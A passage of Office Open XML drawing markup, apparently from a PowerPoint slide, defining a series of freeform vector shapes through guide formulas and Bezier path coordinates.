                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABDE7564-3EC1-4B8B-B787-126682D0527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56" y="1597"/>
                <a:ext cx="124" cy="93"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 395 w 538"/>
                  <a:gd name="T1" fmla="*/ 3 h 407"/>
                  <a:gd name="T2" fmla="*/ 324 w 538"/>
                  <a:gd name="T3" fmla="*/ 8 h 407"/>
                  <a:gd name="T4" fmla="*/ 216 w 538"/>
                  <a:gd name="T5" fmla="*/ 34 h 407"/>
                  <a:gd name="T6" fmla="*/ 1 w 538"/>
                  <a:gd name="T7" fmla="*/ 407 h 407"/>
                  <a:gd name="T8" fmla="*/ 13 w 538"/>
                  <a:gd name="T9" fmla="*/ 404 h 407"/>
                  <a:gd name="T10" fmla="*/ 223 w 538"/>
                  <a:gd name="T11" fmla="*/ 44 h 407"/>
                  <a:gd name="T12" fmla="*/ 323 w 538"/>
                  <a:gd name="T13" fmla="*/ 20 h 407"/>
                  <a:gd name="T14" fmla="*/ 387 w 538"/>
                  <a:gd name="T15" fmla="*/ 16 h 407"/>
                  <a:gd name="T16" fmla="*/ 519 w 538"/>
                  <a:gd name="T17" fmla="*/ 268 h 407"/>
                  <a:gd name="T18" fmla="*/ 530 w 538"/>
                  <a:gd name="T19" fmla="*/ 265 h 407"/>
                  <a:gd name="T20" fmla="*/ 395 w 538"/>
                  <a:gd name="T21" fmla="*/ 3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8" h="407">
                    <a:moveTo>
                      <a:pt x="395" y="3"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="374" y="0"/>
                      <a:pt x="351" y="1"/>
                      <a:pt x="324" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="216" y="34"/>
                      <a:pt x="216" y="34"/>
                      <a:pt x="216" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="93"/>
                      <a:pt x="1" y="407"/>
                      <a:pt x="1" y="407"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="404"/>
                      <a:pt x="13" y="404"/>
                      <a:pt x="13" y="404"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="404"/>
                      <a:pt x="15" y="99"/>
                      <a:pt x="223" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="323" y="20"/>
                      <a:pt x="323" y="20"/>
                      <a:pt x="323" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="347" y="14"/>
                      <a:pt x="368" y="13"/>
                      <a:pt x="387" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="523" y="35"/>
                      <a:pt x="519" y="268"/>
                      <a:pt x="519" y="268"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="530" y="265"/>
                      <a:pt x="530" y="265"/>
                      <a:pt x="530" y="265"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="530" y="265"/>
                      <a:pt x="538" y="26"/>
                      <a:pt x="39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5" name="Freeform 844">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F6B68BC-CFE9-4DA9-A953-48899A1953A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21" y="1559"/>
                <a:ext cx="97" cy="95"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 242 w 421"/>
                  <a:gd name="T1" fmla="*/ 43 h 412"/>
                  <a:gd name="T2" fmla="*/ 350 w 421"/>
                  <a:gd name="T3" fmla="*/ 17 h 412"/>
                  <a:gd name="T4" fmla="*/ 421 w 421"/>
                  <a:gd name="T5" fmla="*/ 13 h 412"/>
                  <a:gd name="T6" fmla="*/ 324 w 421"/>
                  <a:gd name="T7" fmla="*/ 10 h 412"/>
                  <a:gd name="T8" fmla="*/ 216 w 421"/>
                  <a:gd name="T9" fmla="*/ 36 h 412"/>
                  <a:gd name="T10" fmla="*/ 1 w 421"/>
                  <a:gd name="T11" fmla="*/ 409 h 412"/>
                  <a:gd name="T12" fmla="*/ 13 w 421"/>
                  <a:gd name="T13" fmla="*/ 412 h 412"/>
                  <a:gd name="T14" fmla="*/ 242 w 421"/>
                  <a:gd name="T15" fmla="*/ 43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1" h="412">
                    <a:moveTo>
                      <a:pt x="242" y="43"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="350" y="17"/>
                      <a:pt x="350" y="17"/>
                      <a:pt x="350" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="377" y="11"/>
                      <a:pt x="401" y="9"/>
                      <a:pt x="421" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="395" y="3"/>
                      <a:pt x="363" y="0"/>
                      <a:pt x="324" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="216" y="36"/>
                      <a:pt x="216" y="36"/>
                      <a:pt x="216" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="95"/>
                      <a:pt x="1" y="409"/>
                      <a:pt x="1" y="409"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="412"/>
                      <a:pt x="13" y="412"/>
                      <a:pt x="13" y="412"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="412"/>
                      <a:pt x="26" y="102"/>
                      <a:pt x="242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6" name="Freeform 845">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{553A0916-1A00-405C-B1E9-385382A1DF9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10" y="1562"/>
                <a:ext cx="38" cy="60"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 166"/>
                  <a:gd name="T1" fmla="*/ 8 h 261"/>
                  <a:gd name="T2" fmla="*/ 132 w 166"/>
                  <a:gd name="T3" fmla="*/ 258 h 261"/>
                  <a:gd name="T4" fmla="*/ 145 w 166"/>
                  <a:gd name="T5" fmla="*/ 261 h 261"/>
                  <a:gd name="T6" fmla="*/ 0 w 166"/>
                  <a:gd name="T7" fmla="*/ 8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6" h="261">
                    <a:moveTo>
                      <a:pt x="0" y="8"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="28"/>
                      <a:pt x="132" y="258"/>
                      <a:pt x="132" y="258"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="261"/>
                      <a:pt x="145" y="261"/>
                      <a:pt x="145" y="261"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="261"/>
                      <a:pt x="166" y="0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7" name="Freeform 846">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED7E1344-431C-4491-AAAF-64C7A3BB67F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24" y="1561"/>
                <a:ext cx="124" cy="93"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 395 w 538"/>
                  <a:gd name="T1" fmla="*/ 3 h 406"/>
                  <a:gd name="T2" fmla="*/ 323 w 538"/>
                  <a:gd name="T3" fmla="*/ 8 h 406"/>
                  <a:gd name="T4" fmla="*/ 216 w 538"/>
                  <a:gd name="T5" fmla="*/ 33 h 406"/>
                  <a:gd name="T6" fmla="*/ 1 w 538"/>
                  <a:gd name="T7" fmla="*/ 406 h 406"/>
                  <a:gd name="T8" fmla="*/ 13 w 538"/>
                  <a:gd name="T9" fmla="*/ 403 h 406"/>
                  <a:gd name="T10" fmla="*/ 223 w 538"/>
                  <a:gd name="T11" fmla="*/ 43 h 406"/>
                  <a:gd name="T12" fmla="*/ 323 w 538"/>
                  <a:gd name="T13" fmla="*/ 20 h 406"/>
                  <a:gd name="T14" fmla="*/ 387 w 538"/>
                  <a:gd name="T15" fmla="*/ 15 h 406"/>
                  <a:gd name="T16" fmla="*/ 519 w 538"/>
                  <a:gd name="T17" fmla="*/ 267 h 406"/>
                  <a:gd name="T18" fmla="*/ 530 w 538"/>
                  <a:gd name="T19" fmla="*/ 264 h 406"/>
                  <a:gd name="T20" fmla="*/ 395 w 538"/>
                  <a:gd name="T21" fmla="*/ 3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8" h="406">
                    <a:moveTo>
                      <a:pt x="395" y="3"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="374" y="0"/>
                      <a:pt x="351" y="1"/>
                      <a:pt x="323" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="216" y="33"/>
                      <a:pt x="216" y="33"/>
                      <a:pt x="216" y="33"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="92"/>
                      <a:pt x="1" y="406"/>
                      <a:pt x="1" y="406"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="403"/>
                      <a:pt x="13" y="403"/>
                      <a:pt x="13" y="403"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="403"/>
                      <a:pt x="15" y="98"/>
                      <a:pt x="223" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="323" y="20"/>
                      <a:pt x="323" y="20"/>
                      <a:pt x="323" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="347" y="13"/>
                      <a:pt x="368" y="12"/>
                      <a:pt x="387" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="523" y="34"/>
                      <a:pt x="519" y="267"/>
                      <a:pt x="519" y="267"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="530" y="264"/>
                      <a:pt x="530" y="264"/>
                      <a:pt x="530" y="264"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="530" y="264"/>
                      <a:pt x="538" y="26"/>
                      <a:pt x="39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8" name="Freeform 847">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22058C62-3AA7-4706-92B1-33B30965034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84" y="1665"/>
                <a:ext cx="4" cy="4"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 45"/>
                  <a:gd name="T1" fmla="*/ 47 h 47"/>
                  <a:gd name="T2" fmla="*/ 0 w 45"/>
                  <a:gd name="T3" fmla="*/ 12 h 47"/>
                  <a:gd name="T4" fmla="*/ 45 w 45"/>
                  <a:gd name="T5" fmla="*/ 0 h 47"/>
                  <a:gd name="T6" fmla="*/ 45 w 45"/>
                  <a:gd name="T7" fmla="*/ 35 h 47"/>
                  <a:gd name="T8" fmla="*/ 0 w 45"/>
                  <a:gd name="T9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47">
                    <a:moveTo>
                      <a:pt x="0" y="47"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="35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19" name="Freeform 848">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFD1D005-CA3A-4644-AFD7-880E850AA44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01" y="1617"/>
                <a:ext cx="183" cy="52"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 795"/>
                  <a:gd name="T1" fmla="*/ 0 h 228"/>
                  <a:gd name="T2" fmla="*/ 0 w 795"/>
                  <a:gd name="T3" fmla="*/ 13 h 228"/>
                  <a:gd name="T4" fmla="*/ 795 w 795"/>
                  <a:gd name="T5" fmla="*/ 228 h 228"/>
                  <a:gd name="T6" fmla="*/ 795 w 795"/>
                  <a:gd name="T7" fmla="*/ 213 h 228"/>
                  <a:gd name="T8" fmla="*/ 0 w 795"/>
                  <a:gd name="T9" fmla="*/ 0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5" h="228">
                    <a:moveTo>
                      <a:pt x="0" y="0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710" y="205"/>
                      <a:pt x="795" y="228"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="795" y="213"/>
                      <a:pt x="795" y="213"/>
                      <a:pt x="795" y="213"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="708" y="19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0" name="Freeform 849">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9881F1D-F81C-4F78-9EB7-E54974E8E2C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01" y="1616"/>
                <a:ext cx="187" cy="50"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 45 w 1923"/>
                  <a:gd name="T1" fmla="*/ 0 h 515"/>
                  <a:gd name="T2" fmla="*/ 0 w 1923"/>
                  <a:gd name="T3" fmla="*/ 11 h 515"/>
                  <a:gd name="T4" fmla="*/ 1878 w 1923"/>
                  <a:gd name="T5" fmla="*/ 515 h 515"/>
                  <a:gd name="T6" fmla="*/ 1923 w 1923"/>
                  <a:gd name="T7" fmla="*/ 503 h 515"/>
                  <a:gd name="T8" fmla="*/ 45 w 1923"/>
                  <a:gd name="T9" fmla="*/ 0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23" h="515">
                    <a:moveTo>
                      <a:pt x="45" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1878" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1923" y="503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1" name="Freeform 850">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CF94868-D53E-436A-9070-732DE7F7E82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89" y="1645"/>
                <a:ext cx="4" cy="5"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 44"/>
                  <a:gd name="T1" fmla="*/ 48 h 48"/>
                  <a:gd name="T2" fmla="*/ 0 w 44"/>
                  <a:gd name="T3" fmla="*/ 12 h 48"/>
                  <a:gd name="T4" fmla="*/ 44 w 44"/>
                  <a:gd name="T5" fmla="*/ 0 h 48"/>
                  <a:gd name="T6" fmla="*/ 44 w 44"/>
                  <a:gd name="T7" fmla="*/ 36 h 48"/>
                  <a:gd name="T8" fmla="*/ 0 w 44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48">
                    <a:moveTo>
                      <a:pt x="0" y="48"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="36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2" name="Freeform 851">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AB38403-B825-49D9-96C5-5005AAEA395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06" y="1598"/>
                <a:ext cx="183" cy="52"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 795"/>
                  <a:gd name="T1" fmla="*/ 0 h 228"/>
                  <a:gd name="T2" fmla="*/ 0 w 795"/>
                  <a:gd name="T3" fmla="*/ 14 h 228"/>
                  <a:gd name="T4" fmla="*/ 795 w 795"/>
                  <a:gd name="T5" fmla="*/ 228 h 228"/>
                  <a:gd name="T6" fmla="*/ 795 w 795"/>
                  <a:gd name="T7" fmla="*/ 213 h 228"/>
                  <a:gd name="T8" fmla="*/ 0 w 795"/>
                  <a:gd name="T9" fmla="*/ 0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5" h="228">
                    <a:moveTo>
                      <a:pt x="0" y="0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710" y="205"/>
                      <a:pt x="795" y="228"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="795" y="213"/>
                      <a:pt x="795" y="213"/>
                      <a:pt x="795" y="213"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="707" y="19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3" name="Freeform 852">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26DF5CC4-53FF-47D0-AC98-AA6485921E6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06" y="1596"/>
                <a:ext cx="187" cy="51"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 45 w 1922"/>
                  <a:gd name="T1" fmla="*/ 0 h 515"/>
                  <a:gd name="T2" fmla="*/ 0 w 1922"/>
                  <a:gd name="T3" fmla="*/ 12 h 515"/>
                  <a:gd name="T4" fmla="*/ 1878 w 1922"/>
                  <a:gd name="T5" fmla="*/ 515 h 515"/>
                  <a:gd name="T6" fmla="*/ 1922 w 1922"/>
                  <a:gd name="T7" fmla="*/ 503 h 515"/>
                  <a:gd name="T8" fmla="*/ 45 w 1922"/>
                  <a:gd name="T9" fmla="*/ 0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22" h="515">
                    <a:moveTo>
                      <a:pt x="45" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1878" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1922" y="503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4" name="Freeform 853">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66ADE531-CF2C-42B7-B621-BB16273FD35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03" y="1241"/>
                <a:ext cx="50" cy="88"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 513"/>
                  <a:gd name="T1" fmla="*/ 0 h 903"/>
                  <a:gd name="T2" fmla="*/ 97 w 513"/>
                  <a:gd name="T3" fmla="*/ 364 h 903"/>
                  <a:gd name="T4" fmla="*/ 0 w 513"/>
                  <a:gd name="T5" fmla="*/ 858 h 903"/>
                  <a:gd name="T6" fmla="*/ 166 w 513"/>
                  <a:gd name="T7" fmla="*/ 903 h 903"/>
                  <a:gd name="T8" fmla="*/ 513 w 513"/>
                  <a:gd name="T9" fmla="*/ 475 h 903"/>
                  <a:gd name="T10" fmla="*/ 345 w 513"/>
                  <a:gd name="T11" fmla="*/ 90 h 903"/>
                  <a:gd name="T12" fmla="*/ 0 w 513"/>
                  <a:gd name="T13" fmla="*/ 0 h 9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3" h="903">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="97" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="858"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="903"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="513" y="475"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="345" y="9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5" name="Freeform 854">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05C259AA-9C66-4F5B-B6F7-50CD5243FD2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531" y="1277"/>
                <a:ext cx="122" cy="33"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 838 w 1254"/>
                  <a:gd name="T1" fmla="*/ 0 h 336"/>
                  <a:gd name="T2" fmla="*/ 0 w 1254"/>
                  <a:gd name="T3" fmla="*/ 225 h 336"/>
                  <a:gd name="T4" fmla="*/ 415 w 1254"/>
                  <a:gd name="T5" fmla="*/ 336 h 336"/>
                  <a:gd name="T6" fmla="*/ 1254 w 1254"/>
                  <a:gd name="T7" fmla="*/ 111 h 336"/>
                  <a:gd name="T8" fmla="*/ 838 w 1254"/>
                  <a:gd name="T9" fmla="*/ 0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4" h="336">
                    <a:moveTo>
                      <a:pt x="838" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1254" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="838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6" name="Freeform 855">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD21AF97-E39E-45A1-899B-556C3F4E14B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385" y="1157"/>
                <a:ext cx="923" cy="471"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2355 w 4008"/>
                  <a:gd name="T1" fmla="*/ 1794 h 2041"/>
                  <a:gd name="T2" fmla="*/ 3167 w 4008"/>
                  <a:gd name="T3" fmla="*/ 2014 h 2041"/>
                  <a:gd name="T4" fmla="*/ 3818 w 4008"/>
                  <a:gd name="T5" fmla="*/ 1885 h 2041"/>
                  <a:gd name="T6" fmla="*/ 3858 w 4008"/>
                  <a:gd name="T7" fmla="*/ 1600 h 2041"/>
                  <a:gd name="T8" fmla="*/ 3368 w 4008"/>
                  <a:gd name="T9" fmla="*/ 1111 h 2041"/>
                  <a:gd name="T10" fmla="*/ 3043 w 4008"/>
                  <a:gd name="T11" fmla="*/ 963 h 2041"/>
                  <a:gd name="T12" fmla="*/ 2955 w 4008"/>
                  <a:gd name="T13" fmla="*/ 832 h 2041"/>
                  <a:gd name="T14" fmla="*/ 2553 w 4008"/>
                  <a:gd name="T15" fmla="*/ 763 h 2041"/>
                  <a:gd name="T16" fmla="*/ 2423 w 4008"/>
                  <a:gd name="T17" fmla="*/ 803 h 2041"/>
                  <a:gd name="T18" fmla="*/ 1684 w 4008"/>
                  <a:gd name="T19" fmla="*/ 855 h 2041"/>
                  <a:gd name="T20" fmla="*/ 463 w 4008"/>
                  <a:gd name="T21" fmla="*/ 521 h 2041"/>
                  <a:gd name="T22" fmla="*/ 160 w 4008"/>
                  <a:gd name="T23" fmla="*/ 44 h 2041"/>
                  <a:gd name="T24" fmla="*/ 0 w 4008"/>
                  <a:gd name="T25" fmla="*/ 0 h 2041"/>
                  <a:gd name="T26" fmla="*/ 66 w 4008"/>
                  <a:gd name="T27" fmla="*/ 358 h 2041"/>
                  <a:gd name="T28" fmla="*/ 2 w 4008"/>
                  <a:gd name="T29" fmla="*/ 491 h 2041"/>
                  <a:gd name="T30" fmla="*/ 4 w 4008"/>
                  <a:gd name="T31" fmla="*/ 563 h 2041"/>
                  <a:gd name="T32" fmla="*/ 138 w 4008"/>
                  <a:gd name="T33" fmla="*/ 728 h 2041"/>
                  <a:gd name="T34" fmla="*/ 121 w 4008"/>
                  <a:gd name="T35" fmla="*/ 820 h 2041"/>
                  <a:gd name="T36" fmla="*/ 253 w 4008"/>
                  <a:gd name="T37" fmla="*/ 855 h 2041"/>
                  <a:gd name="T38" fmla="*/ 485 w 4008"/>
                  <a:gd name="T39" fmla="*/ 691 h 2041"/>
                  <a:gd name="T40" fmla="*/ 1586 w 4008"/>
                  <a:gd name="T41" fmla="*/ 1074 h 2041"/>
                  <a:gd name="T42" fmla="*/ 2355 w 4008"/>
                  <a:gd name="T43" fmla="*/ 1794 h 20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08" h="2041">
                    <a:moveTo>
                      <a:pt x="2355" y="1794"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2355" y="1794"/>
                      <a:pt x="3101" y="1998"/>
                      <a:pt x="3167" y="2014"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3286" y="2041"/>
                      <a:pt x="3645" y="1997"/>
                      <a:pt x="3818" y="1885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4008" y="1761"/>
                      <a:pt x="3870" y="1613"/>
                      <a:pt x="3858" y="1600"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3368" y="1111"/>
                      <a:pt x="3368" y="1111"/>
                      <a:pt x="3368" y="1111"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3253" y="1018"/>
                      <a:pt x="3043" y="963"/>
                      <a:pt x="3043" y="963"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3043" y="963"/>
                      <a:pt x="2979" y="867"/>
                      <a:pt x="2955" y="832"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2913" y="768"/>
                      <a:pt x="2682" y="730"/>
                      <a:pt x="2553" y="763"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2524" y="771"/>
                      <a:pt x="2423" y="803"/>
                      <a:pt x="2423" y="803"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2423" y="803"/>
                      <a:pt x="2113" y="693"/>
                      <a:pt x="1684" y="855"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1684" y="855"/>
                      <a:pt x="463" y="534"/>
                      <a:pt x="463" y="521"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="463" y="508"/>
                      <a:pt x="160" y="44"/>
                      <a:pt x="160" y="4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6" y="358"/>
                      <a:pt x="66" y="358"/>
                      <a:pt x="66" y="358"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2" y="491"/>
                      <a:pt x="2" y="491"/>
                      <a:pt x="2" y="491"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="563"/>
                      <a:pt x="4" y="563"/>
                      <a:pt x="4" y="563"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="728"/>
                      <a:pt x="138" y="728"/>
                      <a:pt x="138" y="728"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="820"/>
                      <a:pt x="121" y="820"/>
                      <a:pt x="121" y="820"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="253" y="855"/>
                      <a:pt x="253" y="855"/>
                      <a:pt x="253" y="855"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="485" y="691"/>
                      <a:pt x="485" y="691"/>
                      <a:pt x="485" y="691"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1586" y="1074"/>
                      <a:pt x="1586" y="1074"/>
                      <a:pt x="1586" y="1074"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1653" y="1074"/>
                      <a:pt x="1857" y="1597"/>
                      <a:pt x="2355" y="1794"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFCC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7" name="Freeform 856">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DC480B1-288B-43BE-804C-2E0F67663D0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06" y="1239"/>
                <a:ext cx="77" cy="88"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 279 w 334"/>
                  <a:gd name="T1" fmla="*/ 336 h 378"/>
                  <a:gd name="T2" fmla="*/ 67 w 334"/>
                  <a:gd name="T3" fmla="*/ 265 h 378"/>
                  <a:gd name="T4" fmla="*/ 55 w 334"/>
                  <a:gd name="T5" fmla="*/ 42 h 378"/>
                  <a:gd name="T6" fmla="*/ 267 w 334"/>
                  <a:gd name="T7" fmla="*/ 113 h 378"/>
                  <a:gd name="T8" fmla="*/ 279 w 334"/>
                  <a:gd name="T9" fmla="*/ 336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4" h="378">
                    <a:moveTo>
                      <a:pt x="279" y="336"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="223" y="378"/>
                      <a:pt x="128" y="346"/>
                      <a:pt x="67" y="265"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="184"/>
                      <a:pt x="0" y="84"/>
                      <a:pt x="55" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="0"/>
                      <a:pt x="205" y="32"/>
                      <a:pt x="267" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="329" y="194"/>
                      <a:pt x="334" y="294"/>
                      <a:pt x="279" y="33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8" name="Freeform 857">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2274C18F-FE23-4334-9F6D-E29AD971E04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18" y="1249"/>
                <a:ext cx="52" cy="68"/>
